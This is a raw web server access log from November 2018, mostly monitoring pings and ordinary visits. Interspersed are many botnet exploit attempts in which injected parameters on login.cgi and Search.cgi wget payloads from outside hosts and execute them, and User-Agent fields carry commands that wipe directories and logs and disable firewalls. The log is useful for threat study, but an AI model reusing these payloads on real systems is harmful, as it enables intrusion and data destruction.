212.91.246.72 - - [02/Nov/2018:07:58:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:07:59:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
206.189.108.21 - - [02/Nov/2018:07:59:52 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.24.5/hakai.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.24.5/hakai.mipsel -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.24.5/hakai.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:00:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:01:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:02:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:03:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
116.64.62.107 - - [02/Nov/2018:08:04:10 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:04:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
186.216.174.37 - - [02/Nov/2018:08:04:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
46.119.86.41 - - [02/Nov/2018:08:05:28 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bins.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Nov/2018:08:05:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:06:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:07:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:08:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
202.76.217.108 - - [02/Nov/2018:08:08:37 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:09:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:10:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:11:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
159.192.240.163 - - [02/Nov/2018:08:12:11 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Nov/2018:08:12:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
219.106.27.213 - - [02/Nov/2018:08:13:00 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.165.45/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:13:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.33.56.200 - - [02/Nov/2018:08:13:42 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.165/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Nov/2018:08:14:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:15:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.108.66.176 - - [02/Nov/2018:08:16:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
80.18.216.25 - - [02/Nov/2018:08:16:24 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Nov/2018:08:16:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:17:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:18:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:19:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:20:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:21:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
126.48.216.208 - - [02/Nov/2018:08:22:12 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:22:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
177.11.142.37 - - [02/Nov/2018:08:22:41 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
200.71.90.185 - - [02/Nov/2018:08:23:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [02/Nov/2018:08:23:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.21.126.13 - - [02/Nov/2018:08:24:02 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:24:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:25:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:26:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:27:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:28:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
223.217.235.205 - - [02/Nov/2018:08:29:29 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://76.74.177.230/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:29:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
125.165.164.19 - - [02/Nov/2018:08:29:49 +0100] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1" 400 329 "-" "Dark"
212.91.246.72 - - [02/Nov/2018:08:30:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:31:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:32:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:33:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.21.126.13 - - [02/Nov/2018:08:33:33 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:34:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:35:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:36:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:37:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:38:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
62.219.14.94 - - [02/Nov/2018:08:39:13 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
212.91.246.72 - - [02/Nov/2018:08:39:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:40:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.131.64.130 - - [02/Nov/2018:08:40:42 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 329 "-" "LMAO/2.0"
212.91.246.72 - - [02/Nov/2018:08:41:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
60.62.149.23 - - [02/Nov/2018:08:42:09 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.24.5/hakai.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.24.5/hakai.mipsel -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.24.5/hakai.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:42:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:43:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
89.46.223.148 - - [02/Nov/2018:08:44:12 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.24.5/hakai.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.24.5/hakai.mipsel -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.24.5/hakai.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:44:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
152.250.163.201 - - [02/Nov/2018:08:45:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
152.250.163.201 - - [02/Nov/2018:08:45:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
152.250.163.201 - - [02/Nov/2018:08:45:05 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Nov/2018:08:45:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:46:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.109.99.4 - - [02/Nov/2018:08:46:49 +0100] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.33.119/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin HTTP/1.1" 400 329 "-" "Dark"
94.70.163.156 - - [02/Nov/2018:08:46:57 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ngynx%20-O%20-%3E%20/tmp/ngynx;sh%20/tmp/ngynx%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [02/Nov/2018:08:47:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:48:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:49:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:50:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:51:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:52:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:53:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:54:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
112.71.214.41 - - [02/Nov/2018:08:54:51 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:08:55:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:56:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.243.105.152 - - [02/Nov/2018:08:57:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Nov/2018:08:57:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.21.126.13 - - [02/Nov/2018:08:57:46 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.244.25.131/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
178.236.125.198 - - [02/Nov/2018:08:57:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Nov/2018:08:58:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:08:59:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
124.40.64.234 - - [02/Nov/2018:09:00:27 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://212.237.32.62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 329 "-" "LMAO/2.0"
212.91.246.72 - - [02/Nov/2018:09:00:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:01:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:02:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:03:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:04:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:05:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:06:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:07:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:08:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:09:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.78.14.74 - - [02/Nov/2018:09:09:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
175.111.131.230 - - [02/Nov/2018:09:10:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Nov/2018:09:10:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:11:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.167.122.147 - - [02/Nov/2018:09:11:58 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.24.5/Botnet.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.24.5/Botnet.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.24.5/Botnet.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Botnet/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:09:12:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:13:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:14:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:15:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:16:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
59.170.53.241 - - [02/Nov/2018:09:17:06 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.111.168/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [02/Nov/2018:09:17:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:18:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:19:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:20:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Nov/2018:09:21:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
197.210.144.149 - - [02/Nov/2018:09:22:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
